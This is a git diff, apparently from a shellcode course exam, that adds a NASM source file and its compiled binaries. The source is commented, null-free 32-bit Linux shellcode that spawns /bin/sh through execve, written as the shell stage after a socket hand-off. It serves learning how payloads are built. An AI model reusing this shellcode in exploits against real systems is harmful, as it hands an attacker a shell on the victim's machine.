diff --git a/exam1/execve-stack b/exam1/execve-stack new file mode 100755 index 0000000..9731f40 Binary files /dev/null and b/exam1/execve-stack differ diff --git a/exam1/execve-stack.nasm b/exam1/execve-stack.nasm new file mode 100644 index 0000000..35717d1 --- /dev/null +++ b/exam1/execve-stack.nasm @@ -0,0 +1,57 @@ +; Filename: execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + + ; + ; =============================== EXECVE ===================================== + ; + ; Now as we forwarded sockfd to a client, we can spawn shell. + ; Prepare the path, in little-endian, using the Python + ; >>> '//bin/sh'[::-1].encode('hex') + ; '68732f6e69622f2f' + ; + ; int execve(const char *filename, char *const argv[], char *const envp[]); + ; EAX EBX, ECX, EDX + ; 11 '//bin/sh' PTR to EBX NULL + ; + ; + + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + + + ; === EXIT(0) === + ; void _exit(int status); + ; /usr/include/asm/unistd_32.h:#define __NR_exit 1 + xor eax, eax ; EAX = 0x000000 + mov al, 1 ; EAX = 0x000001 1: exit syscall + xor ebx, ebx ; EBX = 0x000000 0: success status + int 0x80 + + +;section .data diff --git a/exam1/execve-stack.o b/exam1/execve-stack.o new file mode 100644 index 0000000..0992e7a Binary files /dev/null and b/exam1/execve-stack.o differ